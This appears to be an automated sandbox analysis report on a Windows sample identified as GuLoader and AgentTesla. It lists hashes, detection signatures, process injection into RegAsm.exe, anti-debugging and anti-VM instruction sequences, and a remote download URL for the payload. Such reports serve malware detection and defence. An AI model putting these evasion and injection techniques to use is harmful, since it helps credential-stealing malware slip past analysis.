Play interactive tour

Edit tour

Analysis Report PO112000891122110.exe

Overview

General Information

Sample Name:	PO112000891122110.exe
Analysis ID:	356643
MD5:	fcc9d54e6b6142da1459a6af8ce507e6
SHA1:	9be22b91de41b513a1198c9a8b35cec7002b03f0
SHA256:	00e8e128207532461425994497ef690fe37b3e1a81df6b001127bfa8ae9036df
Tags:	exeGuLoader
Infos:
Most interesting Screenshot:

Detection

AgentTesla GuLoader

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

Yara detected GuLoader

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Hides threads from debuggers

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Startup

System is w10x64

PO112000891122110.exe (PID: 5420 cmdline: 'C:\Users\user\Desktop\PO112000891122110.exe' MD5: FCC9D54E6B6142DA1459A6AF8CE507E6)

RegAsm.exe (PID: 6820 cmdline: 'C:\Users\user\Desktop\PO112000891122110.exe' MD5: 6FD7592411112729BF6B1F2F6C34899F)

RegAsm.exe (PID: 6860 cmdline: 'C:\Users\user\Desktop\PO112000891122110.exe' MD5: 6FD7592411112729BF6B1F2F6C34899F)

RegAsm.exe (PID: 6900 cmdline: 'C:\Users\user\Desktop\PO112000891122110.exe' MD5: 6FD7592411112729BF6B1F2F6C34899F)

conhost.exe (PID: 6916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author
0000000C.00000002.482428270.00000000013A1000.00000040.00000001.sdmp	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
0000000C.00000002.487587781.000000001DF31000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000002.487587781.000000001DF31000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 6900	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegAsm.exe PID: 6900	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 6900	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: PO112000891122110.exe	Virustotal: Detection: 47%			Perma Link
Source: PO112000891122110.exe	ReversingLabs: Detection: 10%

Compliance:

Uses 32bit PE files

Show sources

Source: PO112000891122110.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Uses secure TLS version for HTTPS connections

Show sources

Source: unknown

HTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.5:49721 version: TLS 1.2

Networking:

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown

DNS traffic detected: queries for: doc-14-58-docs.googleusercontent.com

Source: RegAsm.exe, 0000000C.00000002.487587781.000000001DF31000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: RegAsm.exe, 0000000C.00000002.487587781.000000001DF31000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: RegAsm.exe, 0000000C.00000002.487587781.000000001DF31000.00000004.00000001.sdmp	String found in binary or memory: http://byztWS.com
Source: RegAsm.exe	String found in binary or memory: https://drive.google.com/uc?export=download&id=1ar3iL5h5WPQpgOn4Hhf7j_13MZu1gCM-
Source: RegAsm.exe, 0000000C.00000002.487587781.000000001DF31000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443

Source: unknown

HTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.5:49721 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Source: PO112000891122110.exe, 00000000.00000002.318310102.000000000064A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary:

Source: C:\Users\user\Desktop\PO112000891122110.exe	Code function: 0_2_021C55FD NtProtectVirtualMemory,	0_2_021C55FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_013A5242 NtProtectVirtualMemory,	12_2_013A5242
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_013A56A6 NtQueryInformationProcess,	12_2_013A56A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_013A592E NtQueryInformationProcess,	12_2_013A592E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_013A581B NtQueryInformationProcess,	12_2_013A581B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_013A5705 NtQueryInformationProcess,	12_2_013A5705
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_013A586A NtQueryInformationProcess,	12_2_013A586A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_013A57A2 NtQueryInformationProcess,	12_2_013A57A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_013A528C NtProtectVirtualMemory,	12_2_013A528C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_013A57E0 NtQueryInformationProcess,	12_2_013A57E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_013A58DF NtQueryInformationProcess,	12_2_013A58DF

Source: C:\Users\user\Desktop\PO112000891122110.exe	Code function: 0_2_00401850	0_2_00401850
Source: C:\Users\user\Desktop\PO112000891122110.exe	Code function: 0_2_00401803	0_2_00401803
Source: C:\Users\user\Desktop\PO112000891122110.exe	Code function: 0_2_00401614	0_2_00401614
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_200347A0	12_2_200347A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_20034772	12_2_20034772
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_20034790	12_2_20034790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_20B590F0	12_2_20B590F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_20B57128	12_2_20B57128
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_20B56510	12_2_20B56510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_20B56858	12_2_20B56858

Source: PO112000891122110.exe, 00000000.00000000.214319665.0000000000412000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameKvikslvbarometer.exe vs PO112000891122110.exe
Source: PO112000891122110.exe	Binary or memory string: OriginalFilenameKvikslvbarometer.exe vs PO112000891122110.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Section loaded: sfc.dll

Jump to behavior

Source: PO112000891122110.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal96.troj.evad.winEXE@8/0@1/1

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6916:120:WilError_01

Source: C:\Users\user\Desktop\PO112000891122110.exe

File created: C:\Users\user\AppData\Local\Temp\~DFB7A210640EFA804B.TMP

Jump to behavior

Source: PO112000891122110.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\PO112000891122110.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\PO112000891122110.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: PO112000891122110.exe	Virustotal: Detection: 47%
Source: PO112000891122110.exe	ReversingLabs: Detection: 10%

Source: unknown	Process created: C:\Users\user\Desktop\PO112000891122110.exe 'C:\Users\user\Desktop\PO112000891122110.exe'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PO112000891122110.exe'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PO112000891122110.exe'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PO112000891122110.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PO112000891122110.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PO112000891122110.exe'	Jump to behavior
Source: C:\Users\user\Desktop\PO112000891122110.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PO112000891122110.exe'	Jump to behavior
Source: C:\Users\user\Desktop\PO112000891122110.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PO112000891122110.exe'	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 0000000C.00000002.482428270.00000000013A1000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6900, type: MEMORY

Source: C:\Users\user\Desktop\PO112000891122110.exe	Code function: 0_2_00407384 push B1CEB052h; iretd	0_2_0040738D
Source: C:\Users\user\Desktop\PO112000891122110.exe	Code function: 0_2_021C469F push edi; iretd	0_2_021C46A0
Source: C:\Users\user\Desktop\PO112000891122110.exe	Code function: 0_2_021C4DCC push edx; retn 46ECh	0_2_021C52FC
Source: C:\Users\user\Desktop\PO112000891122110.exe	Code function: 0_2_021C3BF2 push ecx; iretd	0_2_021C3BF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_013A466D push eax; ret	12_2_013A46DA

Hooking and other Techniques for Hiding and Protection:

Source: C:\Users\user\Desktop\PO112000891122110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\user\Desktop\PO112000891122110.exe

RDTSC instruction interceptor: First address: 00000000021C264A second address: 00000000021C264A instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FF4E480A908h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d pop ecx 0x0000001e add edi, edx 0x00000020 jmp 00007FF4E480A92Ah 0x00000022 test ecx, edx 0x00000024 dec ecx 0x00000025 cmp ecx, 00000000h 0x00000028 jne 00007FF4E480A8C7h 0x0000002a push ecx 0x0000002b call 00007FF4E480A948h 0x00000030 call 00007FF4E480A918h 0x00000035 lfence 0x00000038 mov edx, dword ptr [7FFE0014h] 0x0000003e lfence 0x00000041 ret 0x00000042 mov esi, edx 0x00000044 pushad 0x00000045 rdtsc

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\PO112000891122110.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO112000891122110.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: RegAsm.exe

Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\PO112000891122110.exe	RDTSC instruction interceptor: First address: 00000000021C264A second address: 00000000021C264A instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FF4E480A908h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d pop ecx 0x0000001e add edi, edx 0x00000020 jmp 00007FF4E480A92Ah 0x00000022 test ecx, edx 0x00000024 dec ecx 0x00000025 cmp ecx, 00000000h 0x00000028 jne 00007FF4E480A8C7h 0x0000002a push ecx 0x0000002b call 00007FF4E480A948h 0x00000030 call 00007FF4E480A918h 0x00000035 lfence 0x00000038 mov edx, dword ptr [7FFE0014h] 0x0000003e lfence 0x00000041 ret 0x00000042 mov esi, edx 0x00000044 pushad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\PO112000891122110.exe	RDTSC instruction interceptor: First address: 00000000021C27D2 second address: 00000000021C27D2 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FF4E4B37D60h 0x0000001d popad 0x0000001e call 00007FF4E4B35A0Ah 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	RDTSC instruction interceptor: First address: 00000000013A27D2 second address: 00000000013A27D2 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FF4E480CC90h 0x0000001d popad 0x0000001e call 00007FF4E480A93Ah 0x00000023 lfence 0x00000026 rdtsc

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_013A19DC rdtsc

12_2_013A19DC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 2079			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 7770			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6248

Thread sleep time: -20291418481080494s >= -30000s

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: RegAsm.exe

Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\PO112000891122110.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\user\Desktop\PO112000891122110.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_013A19DC rdtsc

12_2_013A19DC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_013A2B99 LdrInitializeThunk,

12_2_013A2B99

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_013A4880 mov eax, dword ptr fs:[00000030h]		12_2_013A4880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_013A4EF8 mov eax, dword ptr fs:[00000030h]		12_2_013A4EF8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\PO112000891122110.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 13A0000

Jump to behavior

Source: C:\Users\user\Desktop\PO112000891122110.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PO112000891122110.exe'	Jump to behavior
Source: C:\Users\user\Desktop\PO112000891122110.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PO112000891122110.exe'	Jump to behavior
Source: C:\Users\user\Desktop\PO112000891122110.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PO112000891122110.exe'	Jump to behavior

Source: RegAsm.exe, 0000000C.00000002.482969404.0000000001B80000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 0000000C.00000002.482969404.0000000001B80000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: RegAsm.exe, 0000000C.00000002.482969404.0000000001B80000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: RegAsm.exe, 0000000C.00000002.482969404.0000000001B80000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: RegAsm.exe, 0000000C.00000002.482969404.0000000001B80000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
